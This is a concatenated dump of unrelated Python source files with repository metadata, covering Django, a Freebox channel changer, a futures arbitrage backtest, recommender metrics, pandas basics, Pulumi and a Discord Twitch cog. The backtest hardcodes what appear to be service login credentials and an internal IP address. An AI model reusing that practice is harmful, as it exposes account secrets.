os.environ.setdefault("DJANGO_SETTINGS_MODULE", "salaryhedge.settings")
application = get_wsgi_application()
| [
"droconnel22@gmail.com"
] | droconnel22@gmail.com |
052b1695bde18eec7367c4ce1d83a35f05d7c79f | 92c104f9624be9d4b260724f8c85a71de269b7bf | /ChannelChanger.py | 7a3ca177207d68f27e348d912c90e0de77cb9990 | [] | no_license | avenezia/Freebox-v5-Management | 185b0f00c4f485d1a2bde290e726a5232717b88c | 112e35e88b2234a55062935f9f2cee72d280f775 | refs/heads/master | 2020-05-18T10:59:53.763929 | 2015-10-11T14:57:12 | 2015-10-11T14:57:12 | 25,402,231 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,613 | py | import random
import re
import requests
import time
remoteControlCodeFile = "remoteControlCode"
def AskRemoteControlCode():
isValid = False
code = ""
while not isValid:
code = raw_input("Please provide the code of your remote control (8 digits): ")
isValid = isValidCode(code)
SaveCode(code)
return code
def ChangeChannel(iCode):
basicUrl = "http://hd1.freebox.fr/pub/remote_control?code=" + iCode + "&key="
directions = ["left", "right"]
random.seed()
while True:
time.sleep(10)
index = random.randint(0, 1)
# Change channel and come back to it, to watch (mainly hear) pay-per-view channels in the "mosaïque" of the FreeTv:
# usually you can hear just 10 seconds and then the channel is muted.
requests.get(basicUrl + directions[index])
requests.get(basicUrl + directions[(index + 1) % len(directions)])
def GetRemoteControlCode():
code = ""
try:
fileWithCode = open(remoteControlCodeFile,"r")
code = fileWithCode.read()
if not isValidCode(code):
raise Exception("The remote control code is not valid, please modify or delete " + remoteControlCodeFile + " file.")
except IOError, e:
code = AskRemoteControlCode()
return code
def isValidCode(iCode):
return re.match("^[0-9]{8}$", iCode) is not None
def SaveCode(iCode):
fileWithCode = open(remoteControlCodeFile, "w")
fileWithCode.write(iCode)
fileWithCode.close()
def main():
code = GetRemoteControlCode()
ChangeChannel(code)
if __name__ == '__main__':
main() | [
"alessandro.venezia86@gmail.com"
] | alessandro.venezia86@gmail.com |
cd856b80d6ed4672151d27dbe1db630024af5417 | d71eb59b3890f15e052bb958cfed03b1da5d9e48 | /intercommodityArbitrage/reverseStrategy_v1.py | 89ad14463dcac9eb94c3b811046cf2ab6987d031 | [] | no_license | JasonGuoSkr/futureArbitrage | 1a9696ee5ba00515c496d143adbc663b164d938c | 3f42ceb914bd9628ef875b4c3924737432b4a396 | refs/heads/master | 2023-04-03T06:50:47.613013 | 2021-04-08T05:18:24 | 2021-04-08T05:18:24 | 262,966,400 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,222 | py | # @Time : 2020/6/7 16:28
# @Author : GUO LULU
import os
import datetime
import numpy as np
import pandas as pd
import plotly.graph_objs as go
from plotly.subplots import make_subplots
import intercommodityArbitrage.futureData
import intercommodityArbitrage.spreadAnalysis
import rqdatac as rq
"""
期货跨品种日内交易策略:
短时间(dateLen)内价差(spread_pct)大幅波动,反向建仓
按一定比例止盈或止损/持仓超过一定时间平仓/日内强制平仓
修改内容:
增加**************
"""
def trading_data(underlying_list, start_date, end_date):
date_list = rq.get_trading_dates(start_date=start_date, end_date=end_date)
price_data = pd.DataFrame()
for date_ind in date_list:
print(date_ind)
contract_list = []
for underlying in underlying_list:
contract = rq.futures.get_dominant(underlying, start_date=date_ind, end_date=date_ind, rule=0)
contract_list.append(contract[date_ind])
data_load = intercommodityArbitrage.futureData.future_data_load(contract_list, start_date=date_ind,
end_date=date_ind)
data_df = pd.DataFrame()
data_df['trading_date'] = data_load[contract_list[0]]['trading_date']
columns_list = ['last', 'a1', 'b1']
for contract_id in contract_list:
contract_data = data_load[contract_id][columns_list]
contract_data.columns = [contract_id[:2] + '_' + columns_name for columns_name in columns_list]
data_df = pd.concat([data_df, contract_data], axis=1)
price_data = pd.concat([price_data, data_df], axis=0)
return price_data
def strategy(underlying_list, start_date, end_date, diff=0.0015, stop=-0.001, close=0.001,
open_len=1200, close_len=7200):
# 数据加载
future_data = trading_data(underlying_list, start_date=start_date, end_date=end_date)
spread_data = intercommodityArbitrage.spreadAnalysis.spread_analysis(underlying_list, start_date, end_date)
# 逐tick回测,获取交易信号
trade_details = pd.DataFrame(columns=['tradeDate', 'openTime', 'closeTime', 'tradeDirection',
'openSpread', 'closeSpread', 'profitSpread', 'profitTrade'])
count_num = -1
date_list = rq.get_trading_dates(start_date, end_date)
for date in date_list:
# date = date_list[0]
print(date)
hold_par = False
pos_par = 0
stop_par = stop
close_par = close
open_spread = 0
open_order = 0
daily_spread = spread_data[future_data['trading_date'] == date]
for order in range(1, daily_spread.shape[0] - 1):
# order = open_len
if order < open_len:
data_series = daily_spread.iloc[0:order, 4]
else:
data_series = daily_spread.iloc[order - open_len:order, 4]
last_spread = data_series.iloc[-1]
max_id = np.max(data_series)
min_id = np.min(data_series)
if not hold_par:
if (last_spread - min_id >= diff) and (max_id - last_spread >= diff):
open_spread = last_spread
open_order = order
hold_par = True
count_num += 1
if last_spread - data_series.iloc[0] >= 0:
pos_par = -1
else:
pos_par = 1
trade_details.loc[count_num, 'tradeDate'] = date
trade_details.loc[count_num, 'openTime'] = data_series.index[-1]
trade_details.loc[count_num, 'tradeDirection'] = pos_par
trade_details.loc[count_num, 'openSpread'] = open_spread
elif (last_spread - min_id >= diff) and (max_id - last_spread < diff):
open_spread = last_spread
open_order = order
pos_par = -1
hold_par = True
count_num += 1
trade_details.loc[count_num, 'tradeDate'] = date
trade_details.loc[count_num, 'openTime'] = data_series.index[-1]
trade_details.loc[count_num, 'tradeDirection'] = pos_par
trade_details.loc[count_num, 'openSpread'] = open_spread
elif (last_spread - min_id < diff) and (max_id - last_spread >= diff):
open_spread = last_spread
open_order = order
pos_par = 1
hold_par = True
count_num += 1
trade_details.loc[count_num, 'tradeDate'] = date
trade_details.loc[count_num, 'openTime'] = data_series.index[-1]
trade_details.loc[count_num, 'tradeDirection'] = pos_par
trade_details.loc[count_num, 'openSpread'] = open_spread
else:
profit_spread = last_spread - open_spread
if (profit_spread <= -close_par) and (pos_par == -1):
trade_details.loc[count_num, 'closeTime'] = data_series.index[-1]
trade_details.loc[count_num, 'closeSpread'] = last_spread
trade_details.loc[count_num, 'profitSpread'] = -profit_spread
pos_par = 0
hold_par = False
if (profit_spread >= -stop_par) and (pos_par == -1):
trade_details.loc[count_num, 'closeTime'] = data_series.index[-1]
trade_details.loc[count_num, 'closeSpread'] = last_spread
trade_details.loc[count_num, 'profitSpread'] = -profit_spread
pos_par = 0
hold_par = False
if (order - open_order > close_len) and (pos_par == -1):
trade_details.loc[count_num, 'closeTime'] = data_series.index[-1]
trade_details.loc[count_num, 'closeSpread'] = last_spread
trade_details.loc[count_num, 'profitSpread'] = -profit_spread
pos_par = 0
hold_par = False
if (profit_spread >= close_par) and (pos_par == 1):
trade_details.loc[count_num, 'closeTime'] = data_series.index[-1]
trade_details.loc[count_num, 'closeSpread'] = last_spread
trade_details.loc[count_num, 'profitSpread'] = profit_spread
pos_par = 0
hold_par = False
if (profit_spread <= stop_par) and (pos_par == 1):
trade_details.loc[count_num, 'closeTime'] = data_series.index[-1]
trade_details.loc[count_num, 'closeSpread'] = last_spread
trade_details.loc[count_num, 'profitSpread'] = profit_spread
pos_par = 0
hold_par = False
if (order - open_order > close_len) and (pos_par == 1):
trade_details.loc[count_num, 'closeTime'] = data_series.index[-1]
trade_details.loc[count_num, 'closeSpread'] = last_spread
trade_details.loc[count_num, 'profitSpread'] = profit_spread
pos_par = 0
hold_par = False
if pos_par == 1:
data_series = daily_spread.iloc[-open_len:, 4]
last_spread = data_series.iloc[-1]
trade_details.loc[count_num, 'closeTime'] = data_series.index[-1]
trade_details.loc[count_num, 'closeSpread'] = last_spread
trade_details.loc[count_num, 'profitSpread'] = last_spread - open_spread
elif pos_par == -1:
data_series = daily_spread.iloc[-open_len:, 4]
last_spread = data_series.iloc[-1]
trade_details.loc[count_num, 'closeTime'] = data_series.index[-1]
trade_details.loc[count_num, 'closeSpread'] = last_spread
trade_details.loc[count_num, 'profitSpread'] = open_spread - last_spread
# 收益计算
for order in trade_details.index:
# order = trade_details.index[0]
open_time = trade_details.loc[order, 'openTime']
close_time = trade_details.loc[order, 'closeTime']
contract_0 = underlying_list[0]
contract_1 = underlying_list[1]
if trade_details.loc[order, 'tradeDirection'] == 1:
long_leg = (future_data.loc[close_time, contract_0 + '_b1'] -
future_data.loc[open_time, contract_0 + '_a1']) / \
future_data.loc[open_time, contract_0 + '_a1']
short_leg = -(future_data.loc[close_time, contract_1 + '_a1'] -
future_data.loc[open_time, contract_1 + '_b1']) / \
future_data.loc[open_time, contract_1 + '_b1']
else:
long_leg = (future_data.loc[close_time, contract_1 + '_b1'] -
future_data.loc[open_time, contract_1 + '_a1']) / \
future_data.loc[open_time, contract_1 + '_a1']
short_leg = -(future_data.loc[close_time, contract_0 + '_a1'] -
future_data.loc[open_time, contract_0 + '_b1']) / \
future_data.loc[open_time, contract_0 + '_b1']
trade_details.loc[order, 'profitTrade'] = (long_leg + short_leg) / 2
# trade_details['profitTrade'].mean()
return trade_details
if __name__ == '__main__':
rq.init("ricequant", "8ricequant8", ('10.29.135.119', 16010))
# 参数 回测区间及合约代码
startDate = '20200101'
endDate = '20200531'
underlyingList = ('IF', 'IH')
diffPar = 0.004
stopPar = -0.0025
closePar = 0.005
openLen = 1800
closeLen = 7200
underlying_list = underlyingList
start_date = startDate
end_date = endDate
tradeDetails = strategy(underlyingList, startDate, endDate, diff=diffPar,
stop=stopPar, close=closePar, open_len=openLen, close_len=closeLen)
tradeDetails = tradeDetails[tradeDetails['tradeDate'] != datetime.date(2020, 2, 3)]
tradeDetails['profitTrade'].mean()
| [
"gl18253166772@163.com"
] | gl18253166772@163.com |
8b51c987b63b3177ed110cb9eba833dc3e9b1891 | c1cd6a7a446934c428bc4fbf988f8d6680460488 | /dist/restclient.app/Contents/Resources/py2app/bootstrap/path_inject.py | ace081845b5061c6e400919901db030b61234c9f | [] | no_license | devvmh/restclient-py2app | ed016d1763ee99779388c8700dfb9c129cf8ce1a | 6826f6cb81c08a36b30878683a58e4f7a18f5041 | refs/heads/master | 2021-01-10T12:01:31.411373 | 2016-01-18T03:34:02 | 2016-01-18T03:34:02 | 49,850,053 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | /Users/devin/git/restclient/venv/lib/python2.7/site-packages/py2app/bootstrap/path_inject.py | [
"devin@callysto.com"
] | devin@callysto.com |
9bbd1824156c6c3fbddd4d501507406d7e4363ca | 34179547b19e84de36658edc3bc1d467ea9def22 | /2018/Evaluator.py | 6ebdd31f78eb0feb444335fe4235dcf0300168de | [] | no_license | MathyasGiudici/polimi-recsys-challenge | a7ca211a0d76a8ac900ad36051854a268bc8d944 | 7ec8b5913d51772bb79fbff932fba73c806f1121 | refs/heads/master | 2022-04-18T20:41:28.739208 | 2020-01-13T19:32:07 | 2020-01-13T19:32:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,804 | py | import numpy as np
def precision(recommended_items, relevant_items):
is_relevant = np.in1d(recommended_items, relevant_items, assume_unique=True)
precision_score = np.sum(is_relevant, dtype=np.float32) / len(is_relevant)
return precision_score
def recall(recommended_items, relevant_items):
is_relevant = np.in1d(recommended_items, relevant_items, assume_unique=True)
recall_score = np.sum(is_relevant, dtype=np.float32) / relevant_items.shape[0]
return recall_score
def MAP(recommended_items, relevant_items):
is_relevant = np.in1d(recommended_items, relevant_items, assume_unique=True)
# Cumulative sum: precision at 1, at 2, at 3 ...
p_at_k = is_relevant * np.cumsum(is_relevant, dtype=np.float32) / (1 + np.arange(is_relevant.shape[0]))
map_score = np.sum(p_at_k) / np.min([relevant_items.shape[0], is_relevant.shape[0]])
return map_score
def evaluate_algorithm(URM_test, recommender_object, userList_unique, at=10):
cumulative_precision = 0.0
cumulative_recall = 0.0
cumulative_MAP = 0.0
num_eval = 0
for user_id in userList_unique:
relevant_items = URM_test[user_id].indices
if len(relevant_items) > 0:
recommended_items = recommender_object.recommend(user_id, at=at)
num_eval += 1
cumulative_precision += precision(recommended_items, relevant_items)
cumulative_recall += recall(recommended_items, relevant_items)
cumulative_MAP += MAP(recommended_items, relevant_items)
cumulative_precision /= num_eval
cumulative_recall /= num_eval
cumulative_MAP /= num_eval
print("Recommender performance is: Precision = {:.4f}, Recall = {:.4f}, MAP = {:.4f}".format(
cumulative_precision, cumulative_recall, cumulative_MAP))
| [
"mathyas.giudici@mail.polimi.it"
] | mathyas.giudici@mail.polimi.it |
ed4509fd979a91930169ae8f72c2fecda12f5bb8 | 187ea97ac522e70a7c3c7c1f0d85a1f98a347f3b | /config.py | 32b5b1180419be78b0c8e28fdf1f16eaafb2b0dc | [] | no_license | RomanRusyn/gRPC_weather | 538a01146a3e01cb58baaf4840c68c362572f222 | 3a2accb4033111c3861196fa8f09f4db192c4ff8 | refs/heads/master | 2023-07-14T13:41:51.109402 | 2021-08-26T09:22:24 | 2021-08-26T09:22:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | import logging
from confluent_kafka import Consumer
log = logging.basicConfig(filename='consumer_results.log', filemode='w',
datefmt='%d-%b-%y %H:%M:%S',
level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s '
'- %(message)s')
consumer = Consumer({
'bootstrap.servers': 'localhost:29092',
'group.id': 'mygroup',
'auto.offset.reset': 'earliest'
})
port_grpc = '[::]:50051'
| [
"romanR@ss"
] | romanR@ss |
bcc17cde14b9b19e6d3ad5157dd1b1d909f06dc6 | 87434c060cc23d82e527c0e2f1f972c29e30a0bf | /main/experiments_urls.py | ee187656a35ba90e7f8bad1cc167a5b26d7cce7d | [] | no_license | NSchroeder97/HSB-PHYSIK | 2581f95cee8a82cdf031d4578507bb5c3dc86988 | a4d3c7cea2f6dc9271a5f15f335b72115b00d51a | refs/heads/main | 2023-05-26T15:48:18.974023 | 2021-05-12T12:11:01 | 2021-05-12T12:11:01 | 371,008,727 | 0 | 0 | null | 2021-05-26T11:25:22 | 2021-05-26T11:25:22 | null | UTF-8 | Python | false | false | 697 | py | from django.shortcuts import render
from django.http import HttpResponse, JsonResponse
from . import experiments
# Doppelspalt
def doppelspalt(response):
return render(response, 'main/experiments/doppelspalt/index.html')
# Return the data
def doppelspalt_api(response, lam, b, d, angle):
data = experiments.doppelspalt.doppel_data(lam, b, d, angle)
return JsonResponse(data, safe=False)
def laser_emissions(response):
return render(response, 'main/experiments/laser_emissions/index.html')
def laser_emissions_api(response, n_atoms, n_photons, niveau):
data = experiments.laser_emissions.level_emissions(n_atoms, n_photons, niveau)
return JsonResponse(data, safe=False) | [
"mail@lars-jelschen.de"
] | mail@lars-jelschen.de |
3e612434ec8be084c6f74e3e8af5bfb81ced3033 | 20d03615ecb5282fb10dca75dd11469db5d02065 | /prq.py | 1d2d798324bcd01961bb07cf4ba6e4538cf39d23 | [] | no_license | laharikaneelam/Python_exercises | 227f2d3c51b652991c77f1e9a947b435376ba9bf | 0fcd396a465294c94a20272367799e395cdde954 | refs/heads/main | 2023-01-24T08:42:46.409130 | 2020-11-26T14:39:35 | 2020-11-26T14:39:35 | 314,806,989 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 96 | py | def prt(aswrd):
sch=aswrd.strip()
sch=aswrd.upper()
print(f"{aswrd}")
prt("print")
| [
"noreply@github.com"
] | noreply@github.com |
1f72205dad514935455fd3be194807f4ebba7730 | 7a10bf8748c7ce9c24c5461c21b5ebf420f18109 | /ml_training/PythonCode/P4_Pandas_Basics.py | 76770dbb25d18994fa84bd5163e320d499c538b4 | [] | no_license | VishalChak/machine_learning | aced4b4bf65bbbd08c966a2f028f217a918186d5 | c6e29abe0509a43713f35ebf53da29cd1f0314c1 | refs/heads/master | 2021-06-15T07:13:56.583097 | 2019-10-05T06:01:58 | 2019-10-05T06:01:58 | 133,164,656 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,051 | py |
# Import Library
import pandas as pd
# Read data from a url
url = "https://vincentarelbundock.github.io/Rdatasets/csv/datasets/HairEyeColor.csv"
df = pd.read_csv(url)
# Type of the df object
type(df)
# Column names
list(df)
# Show first few rows
df.head()
# Show last few rows
df.tail()
# Data type of each column
df.dtypes
# Return number of columns and rows of dataframe
df.shape
# Number of rows
len(df.index)
# Number of columns
len(df.columns)
# Basic statistics
df.describe()
# Extract first three rows
df[0:3]
# or
#df.iloc[:3]
# Filter for black hair
#df[df['Hair']=="Black"]
# or
df.query("Hair =='Black'")
# Filter for males who have black hair
#df[(df['Hair']=="Black") & (df["Sex"]=="Male")]
# or
df.query("Hair == 'Black' & Sex =='Male'")
#WAP to Filter for those who have brown eye or black hair
#Ans:
z = df[(df['Hair']=="Black") | (df["Eye"]=="Brown")]
# or
z = df.query("Hair == 'Black' | Eye =='Brown'")
z.head(6)
# Filter for eye color of blue, hazel and green
df[df.Eye.isin(['Blue','Hazel','Green'])].head()
# Select one column
df[["Eye"]].head()
# or
df.Eye.head()
# Select two columns
df[["Eye","Sex"]].head()
# Unique Eye colors
df["Eye"].unique()
# Maximum of the "Freq" column
df.Freq.max()
# Call functions on multiple columns
import numpy as np
pd.DataFrame({'Max_freq': [df.Freq.max()], 'Min_freq': [df.Freq.min()], 'Std_freq': [np.std(df.Freq)]})
# Maximum Frequency by Sex
df.groupby("Sex").agg({"Freq":"max"})
#Display max Freq by color
df.groupby("Eye").agg({"Freq":"max"})
# Count by Eye color and Sex
df.groupby(["Eye","Sex"]).agg({"Freq":"count"}).rename(columns={"Freq":"Count"})
# Call functions for grouping
df.assign(Gt50 = (df.Freq > 50)).groupby("Gt50").agg({"Gt50":"count"}).rename(columns ={"Gt50":"Count"})
# Do the analysis on selected rows only
pd.DataFrame({'Max_freq': [df[0:10].Freq.max()], 'Min_freq': [df[0:10].Freq.min()], 'Std_freq': [np.std(df[0:10].Freq)]})
# Remove a column
df.drop('Unnamed: 0', 1).head()
# Return the first occurance
df.query("Eye == 'Blue'")[:1]
# Return the last occurance
df.query("Eye == 'Blue'")[-1:]
# Return a count
df[df.Eye.isin(['Blue','Hazel']) & (df.Sex=="Male")].shape[0]
# Count for each group
df[df.Eye.isin(['Blue','Hazel']) & (df.Sex=="Male")].groupby(["Eye","Sex"]).agg({"Freq":"count"}).rename(columns={"Freq":"Count"})
# Order in ascending order
df.sort_values(by='Freq').tail(6)
# Order in descending order
df.sort_values(by='Freq', ascending = False).tail(6)
# "Freq" in descending and "Eye" in ascending
df.sort_values(by=['Freq','Eye'], ascending = [False,True]).tail(6)
# Rename columns
df.rename(columns = {"Freq":"Frequency","Eye":"Eye_Color"}).tail()
# Unique rows
df[["Eye","Sex"]].drop_duplicates()
# Create new column
df.assign(Eye_Hair =df.Eye + df.Hair)[["Eye","Hair","Eye_Hair"]].head()
| [
"vishalbabu.in@gmail.com"
] | vishalbabu.in@gmail.com |
4de23b31d356ffaea7b2fdcd2e520c3510ebcf5a | a4423a4d393181daf8cd7d5d1426f6b0349a75e8 | /SGR_database/database/migrations/0014_auto_20210715_0518.py | 7dfde0fab8f5f910cffe944866dd4f773f121618 | [] | no_license | CharlieWelly/SGR | 73464a9f17b4aa233005eea1331c03a8c64b0646 | feaf123cd3a5a4ac92011ddb9595fa61c086b9a4 | refs/heads/master | 2023-06-15T18:27:12.907551 | 2021-07-15T11:14:29 | 2021-07-15T11:14:29 | 381,625,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 596 | py | # Generated by Django 3.2.4 on 2021-07-15 05:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('database', '0013_rename_statement_categories_statement_statement_category'),
]
operations = [
migrations.RemoveConstraint(
model_name='statement',
name='unique_statement',
),
migrations.AddConstraint(
model_name='statement',
constraint=models.UniqueConstraint(fields=('statement_category', 'statement_name'), name='unique_statement'),
),
]
| [
"chicuong.tran08@gmail.com"
] | chicuong.tran08@gmail.com |
92d05229bfa88ea1c51868a7605e54193ba9900b | 6ca91984eb1bfaae020072e30ac8ba5b81a538ae | /python_ops/__init__.py | b750bcea97b6b2f7a9b06ee6bad54c794aabbb75 | [] | no_license | nikhilmishra000/tf_utils | 052b3f97715745638901a70bdcde662aa433e10f | 0370320d8d276905cbc564d11d4867bf6c025e98 | refs/heads/master | 2021-01-18T12:21:30.357692 | 2017-03-03T05:38:41 | 2017-03-03T05:38:41 | 68,735,993 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 165 | py | from .ops import *
from .conv_ops import *
from .causal_conv import *
fc_stack = make_stack(affine)
conv_stack = make_stack(conv)
deconv_stack = make_stack(deconv)
| [
"nikhilmishra000@gmail.com"
] | nikhilmishra000@gmail.com |
147eabb86c23fd8281b4ba09190388f7a3989371 | 549afd4c4c5c9b401a2643210d6a4d75b7aaa308 | /src/optlang_operations.py | 17e0c0f49974128cd21393d536cc7587fb94db62 | [] | no_license | OGalOz/FBA_Learn_Python | ff6c4ab5335b8f0cbfead5dc8da7392429503235 | 2df9b6fd128db8af1f97f6d12e9ab34ec5268a49 | refs/heads/master | 2023-05-27T03:06:27.671342 | 2019-10-07T18:19:34 | 2019-10-07T18:19:34 | 210,938,075 | 0 | 2 | null | 2019-10-03T21:48:04 | 2019-09-25T20:49:44 | Python | UTF-8 | Python | false | false | 2,749 | py | # In this file we make use of optlang
# More info here: https://optlang.readthedocs.io/en/latest/
from optlang import Model, Variable, Constraint, Objective
# You can declare the symbolic variables here with upper and lower bounds:
'''
x1 = Variable('x1', lb=0, ub = 100)
'''
#S is the stoichiomatrix as passed in by numpy
# objective function is the last variable (v)
# upperbound needs to be an int
# Constraints is as long as the amount of compounds
# flux_bounds is as long as the amount of reactions. It is a d2_list
# flux_bounds = [[lower bounds],[upper bounds]]
def stoichiomatrix_solution(S, flux_bounds, objective_index, objective_direction):
#We make a variable 'v-(index)' for each reaction (column) in the matrix:
variables = make_variables(S, flux_bounds)
constraints = make_constraints(S, variables)
obj = make_objective(objective_index, objective_direction, variables)
model= Model(name='Stoichiomatrix')
model.objective = obj
model.add(constraints)
status = model.optimize()
return [status, model]
# This function makes the variables
def make_variables(S, flux_bounds):
variables = []
row_1 = S[0]
for i in range(len(row_1)):
v = Variable('v-' + str(i+1), lb = flux_bounds[0][i], ub = flux_bounds[1][i])
variables.append(v)
print(variables)
return variables
def make_constraints(S, variables):
#Creating the constraints, one per compound:
constraints = []
for row in S:
constraint_sum = 0
for i in range(len(row)):
constraint_sum += row[i]*variables[i]
c = Constraint(constraint_sum, lb=0, ub =0)
constraints.append(c)
return constraints
def make_objective(objective_index, objective_direction, variables):
#The objective is just to either Maximize or Minimize a Variable.
obj_var = variables[objective_index]
print("Objective variable name: " + obj_var.name)
obj = Objective(variables[objective_index], direction = objective_direction)
return obj
def model_print(model):
print("status:", model.status)
#print("objective variable name: " + model.objective.name)
print("objective value:", model.objective.value)
print("----------")
print(model.variables.items())
for var_name, var in model.variables.items():
print(var_name, "=", var.primal)
def make_fluxes(model):
#fluxes holds the names and their values, then we sort by that and make the fluxes array
fluxes = []
for var_name, var in model.variables.items():
fluxes.append([int(var_name[2:]),var.primal])
fluxes.sort(key = lambda fluxes: fluxes[0])
flux_array = []
for flux in fluxes:
flux_array.append(flux[1])
return flux_array
| [
"ogaloz@lbl.gov"
] | ogaloz@lbl.gov |
eb86c5d2bcdc85721b23e67fb5747812f0c969e5 | a6e4a6f0a73d24a6ba957277899adbd9b84bd594 | /sdk/python/pulumi_azure_native/providerhub/v20201120/get_skus_nested_resource_type_first.py | 48f43b29f82376eb8e0e141895212a4bf923acac | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | MisinformedDNA/pulumi-azure-native | 9cbd75306e9c8f92abc25be3f73c113cb93865e9 | de974fd984f7e98649951dbe80b4fc0603d03356 | refs/heads/master | 2023-03-24T22:02:03.842935 | 2021-03-08T21:16:19 | 2021-03-08T21:16:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,018 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'GetSkusNestedResourceTypeFirstResult',
'AwaitableGetSkusNestedResourceTypeFirstResult',
'get_skus_nested_resource_type_first',
]
@pulumi.output_type
class GetSkusNestedResourceTypeFirstResult:
def __init__(__self__, id=None, name=None, properties=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if properties and not isinstance(properties, dict):
raise TypeError("Expected argument 'properties' to be a dict")
pulumi.set(__self__, "properties", properties)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> 'outputs.SkuResourceResponseProperties':
return pulumi.get(self, "properties")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
"""
return pulumi.get(self, "type")
class AwaitableGetSkusNestedResourceTypeFirstResult(GetSkusNestedResourceTypeFirstResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetSkusNestedResourceTypeFirstResult(
id=self.id,
name=self.name,
properties=self.properties,
type=self.type)
def get_skus_nested_resource_type_first(nested_resource_type_first: Optional[str] = None,
provider_namespace: Optional[str] = None,
resource_type: Optional[str] = None,
sku: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSkusNestedResourceTypeFirstResult:
"""
Use this data source to access information about an existing resource.
:param str nested_resource_type_first: The first child resource type.
:param str provider_namespace: The name of the resource provider hosted within ProviderHub.
:param str resource_type: The resource type.
:param str sku: The SKU.
"""
__args__ = dict()
__args__['nestedResourceTypeFirst'] = nested_resource_type_first
__args__['providerNamespace'] = provider_namespace
__args__['resourceType'] = resource_type
__args__['sku'] = sku
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:providerhub/v20201120:getSkusNestedResourceTypeFirst', __args__, opts=opts, typ=GetSkusNestedResourceTypeFirstResult).value
return AwaitableGetSkusNestedResourceTypeFirstResult(
id=__ret__.id,
name=__ret__.name,
properties=__ret__.properties,
type=__ret__.type)
| [
"noreply@github.com"
] | noreply@github.com |
c909c27dee1ebaf63d9a85b7a5f256163a57af3d | 80e80d222068f26773b5a866d4244ec215227bf2 | /cogs/twitch.py | ee9f751519ff13013e23e8ba336aa9b69ded0b29 | [
"MIT"
] | permissive | coma3009/harin | 399958aea42b37b04c2e259f88a4624ed5c8a1ad | b0fb198a5928b05c032d017e3f6998a978c9b92e | refs/heads/master | 2023-09-03T02:30:45.241978 | 2021-11-22T07:19:04 | 2021-11-22T07:19:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,966 | py | import asyncio
import json
import os
import time
import traceback
import aiohttp
import aiosqlite
import discord
import discordSuperUtils
import requests
from PycordPaginator import Paginator
from discord.ext import commands
from typing import List
from discord_components import Select, SelectOption, Button
from dotenv import load_dotenv
load_dotenv(verbose=True)
def mTwitchOauth2():
key = ''
try:
key = requests.post("https://id.twitch.tv/oauth2/token?client_id=" + os.getenv('TWITCH_CLIENT_ID') +
"&client_secret=" + os.getenv('twitch_client_secret') + "&grant_type=client_credentials")
except requests.exceptions.Timeout as te:
print(te)
except requests.exceptions.ConnectionError as ce:
print(ce)
except requests.exceptions.HTTPError as he:
print(he)
# Any Error except upper exception
except requests.exceptions.RequestException as re:
print(re)
access_token = json.loads(key.text)["access_token"]
print(access_token)
return access_token
class twitch(commands.Cog):
def __init__(self, bot):
super().__init__()
self.bot = bot
self.live = {}
self.access_token = mTwitchOauth2()
self.TwitchManager = discordSuperUtils.TwitchManager(bot, os.getenv('TWITCH_CLIENT_ID'), self.access_token)
self.bot.loop.create_task(self.twitch_loop())
@staticmethod
def add_stream_fields(embed: discord.Embed, stream: dict):
embed.add_field(
name="Title",
value=f"[{stream['title']}](https://twitch.tv/{stream['user_name']})",
inline=False,
)
embed.add_field(name="Game", value=stream["game_name"], inline=False)
embed.add_field(name="Viewers", value=str(stream["viewer_count"]), inline=False)
embed.add_field(
name="Started At", value=stream["started_at"], inline=False
) # You can format it.
embed.add_field(
name="Mature",
value="Yes" if stream["is_mature"] else "No",
inline=False,
)
embed.add_field(name="Language", value=stream["language"].upper(), inline=False)
embed.set_image(url=stream["thumbnail_url"].format(height=248, width=440))
@staticmethod
def loop_stream_fields(embed: discord.Embed, stream: dict):
embed.add_field(
name="Title",
value=f"[{stream['title']}](https://twitch.tv/{stream['broadcaster_login']})",
inline=False,
)
embed.add_field(name="Game", value=stream["game_name"], inline=False)
embed.add_field(
name="Started At", value=stream["started_at"], inline=False
) # You can format it.
embed.add_field(name="Language", value=stream["broadcaster_language"].upper(), inline=False)
embed.set_image(url=stream["thumbnail_url"].format(height=248, width=440))
@commands.group(name="트위치", invoke_without_command=True)
async def twitch_(self,ctx):
db = await aiosqlite.connect("db/db.sqlite")
twitch_cur = await db.execute("SELECT * FROM twitch WHERE guild = ?",(ctx.guild.id,))
premium_cur = await db.execute("SELECT * FROM premium WHERE guild = ?",(ctx.guild.id,))
